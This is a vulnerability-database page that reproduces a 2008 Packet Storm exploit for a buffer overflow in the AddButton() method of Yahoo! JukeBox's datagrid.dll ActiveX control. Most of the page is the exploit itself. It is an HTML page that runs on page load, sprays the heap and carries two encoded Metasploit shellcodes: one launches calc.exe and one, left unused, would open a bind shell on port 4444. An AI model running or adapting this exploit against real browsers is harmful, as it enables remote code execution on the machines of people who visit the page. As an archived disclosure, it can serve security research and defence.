Lucene search

K

yahoomusic-overflow4.txt

🗓️ 04 Feb 2008 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit by e.b. Vulnerability discovered by Krystian Kloskowski ([email protected]) Tested on Windows XP SP2 (fully patched) English, IE

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!--   
Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit  
written by e.b.  
Vulnerability discovered by Krystian Kloskowski ([email protected])  
Inspired by http://milw0rm.com/exploits/5046  
Tested on Windows XP SP2(fully patched) English, IE6, datagrid.dll version 2.2.2.56  
Thanks to h.d.m. and the Metasploit crew   
-->  
<html>  
<head>  
<title>Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit</title>  
<script language="JavaScript" defer>  
function Check() {  
  
  
  
  
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com   
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +  
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +  
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +  
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +  
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +  
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +  
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +  
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +  
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +  
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +  
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +  
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +  
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +  
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +  
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +  
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +  
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +  
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +  
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +  
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +  
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +  
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +  
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +  
"%u314e%u7475%u7038%u7765%u4370");  
  
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com   
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +  
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +  
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +  
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +  
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +  
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +  
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +  
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +  
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +  
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +  
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +  
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +  
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +  
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +  
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +  
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +  
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +  
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +  
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +  
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +  
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +  
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +  
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +  
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +  
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +  
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +  
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +  
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +  
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +  
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +  
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +  
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +  
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +  
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +  
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +  
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +  
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +  
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +  
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +  
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +  
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +  
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +  
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +  
"%u684f%u3956%u386f%u4350");  
  
  
var bigblock = unescape("%u0A0A%u0A0A");  
var headersize = 20;  
var slackspace = headersize + shellcode1.length;  
while (bigblock.length < slackspace) bigblock += bigblock;  
var fillblock = bigblock.substring(0,slackspace);  
var block = bigblock.substring(0,bigblock.length - slackspace);  
while (block.length + slackspace < 0x40000) block = block + block + fillblock;  
  
  
  
var memory = new Array();  
for (i = 0; i < 500; i++){ memory[i] = block + shellcode1 }  
  
var buf = ""  
for (i = 0; i < 400; i++) { buf = buf + unescape("%u0A0A") }  
  
obj.AddButton("http://" + buf,1);  
  
  
}   
  
</script>  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C">  
Unable to create object  
</object>  
</body>  
</html>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo